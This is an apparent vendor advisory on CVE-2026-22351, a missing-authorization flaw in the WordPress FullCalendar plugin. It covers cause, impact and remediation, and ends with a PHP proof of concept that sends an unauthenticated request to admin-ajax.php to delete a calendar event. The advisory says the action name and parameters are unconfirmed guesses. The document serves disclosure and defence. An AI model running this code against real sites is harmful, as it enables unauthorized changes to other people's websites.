Atomic Edge analysis of CVE-2026-22351 (metadata-based):
This vulnerability is a Missing Authorization flaw in the WordPress FullCalendar plugin, version 1.6 and earlier. The flaw allows unauthenticated attackers to trigger a privileged plugin function, leading to unauthorized actions. The CVSS score of 5.3 (Medium) reflects a network-accessible attack with low attack complexity that impacts integrity.
Atomic Edge research identifies the root cause as a missing capability check on a WordPress AJAX hook handler. The CWE-862 classification confirms the plugin fails to verify a user’s permissions before executing a function. This conclusion is inferred from the vulnerability description and standard WordPress plugin architecture. Without a code diff, the exact function name is unconfirmed, but the pattern is consistent with an `add_action(‘wp_ajax_nopriv_…’)` hook lacking a corresponding user authorization check.
Exploitation involves sending a crafted HTTP POST request to the WordPress AJAX endpoint. The attacker targets `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to the vulnerable plugin function. Based on the plugin slug ‘wp-fullcalendar’, a likely action parameter is `wpfc_ajax_action` or a similar derivative. The payload would contain parameters required by the underlying function, such as event data or calendar settings, to perform the unauthorized action.
Remediation requires adding a proper capability check to the vulnerable function. The fix should verify the current user has appropriate permissions, typically using `current_user_can()`. The AJAX handler should also be registered only for authenticated users by using `wp_ajax_{action}` instead of `wp_ajax_nopriv_{action}` unless the function is intentionally public. Input validation and nonce verification should also be implemented for defense in depth.
The direct impact is unauthorized data modification or a site state change. An attacker could delete calendar events, modify event details, or alter plugin settings. The vulnerability does not lead to direct information disclosure or remote code execution based on the CVSS metrics (Confidentiality: None, Integrity: Low, Availability: None). However, unauthorized changes could disrupt site functionality or user experience.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22351 - FullCalendar <= 1.6 - Missing Authorization
<?php
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
// The exact AJAX action is not confirmed from metadata.
// This PoC uses a common pattern derived from the plugin slug.
$likely_action = 'wpfc_ajax_action';
// Assumed parameter based on plugin functionality (calendar event manipulation).
$post_data = array(
'action' => $likely_action,
'method' => 'deleteEvent', // Example unauthorized action
'event_id' => '1', // Example target event ID
// Other parameters may be required depending on the actual function.
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response Body: $responsen";
// A successful exploitation attempt may return a specific JSON response.
// Without knowing the exact function, success is inferred from a 200 OK and plugin-specific output.
if ($http_code == 200 && strpos($response, 'success') !== false) {
echo "[+] Potential exploitation successful.n";
} else {
echo "[-] Exploitation attempt may have failed or the action parameter is incorrect.n";
}
?>
